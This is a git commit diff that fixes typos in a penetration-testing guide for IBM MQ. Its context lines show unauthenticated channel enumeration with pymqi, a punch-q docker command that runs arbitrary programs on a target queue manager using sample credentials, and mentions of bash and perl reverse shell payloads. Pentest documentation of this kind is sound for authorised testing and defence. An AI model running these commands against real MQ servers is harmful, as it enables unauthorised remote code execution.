Update 1414-pentesting-ibmmq.md (typos)
This commit is contained in:
parent
30cbf6ebc7
commit
fe88ec40e7
|
@ -102,7 +102,7 @@ It happens that some IBM MQ instances accept **unauthenticated** MQ requests, so
|
|||
|
||||
As soon as we get one channel name (here: `DEV.ADMIN.SVRCONN`), we can enumerate all other channels.
|
||||
|
||||
The enumeration can basically be done with this code snippet `code/examples/dis_channels.py` from *pymqi*:
|
||||
The enumeration can basically be done with this code snippet `code/examples/dis_channels.py` from **pymqi**:
|
||||
|
||||
```python
|
||||
import logging
|
||||
|
@ -222,7 +222,7 @@ You can target queue(s)/channel(s) to sniff out / dump messages from them (non-d
|
|||
>
|
||||
> *Note: always according to IBM MQ documentation (Administration Reference), there is also an HTTP endpoint at `/admin/action/qmgr/{qmgrName}/mqsc` to run the equivalent MQSC command for service creation (`DEFINE SERVICE`). This aspect is not covered yet here.*
|
||||
|
||||
The service creation / deletion with PCF for remote program execution is can be done by **punch-q**:
|
||||
The service creation / deletion with PCF for remote program execution can be done by **punch-q**:
|
||||
|
||||
**Example 1**
|
||||
|
||||
|
@ -240,7 +240,7 @@ You can also enumerate existing programs on the machine (here `/bin/doesnotexist
|
|||
|
||||
```bash
|
||||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
|
||||
s "-c id"
|
||||
s "whatever"
|
||||
Command: /bin/doesnotexist
|
||||
Arguments: -c id
|
||||
Service Name: 6e3ef5af652b4436
|
||||
|
@ -262,7 +262,7 @@ For easy reverse shell, **punch-q** proposes also two reverse shell payloads :
|
|||
* One with bash
|
||||
* One with perl
|
||||
|
||||
*Of course you can build a custom one with the `execute`.*
|
||||
*Of course you can build a custom one with the `execute` command.*
|
||||
|
||||
For bash:
|
||||
|
||||
|
@ -368,4 +368,4 @@ CONTAINER ID IMAGE COMMAND CRE
|
|||
|
||||
* [mgeeky's gist - "Practical IBM MQ Penetration Testing notes"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec)
|
||||
* [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf)
|
||||
* [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq)
|
||||
* [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq)
|
||||
|
|
Loading…
Reference in New Issue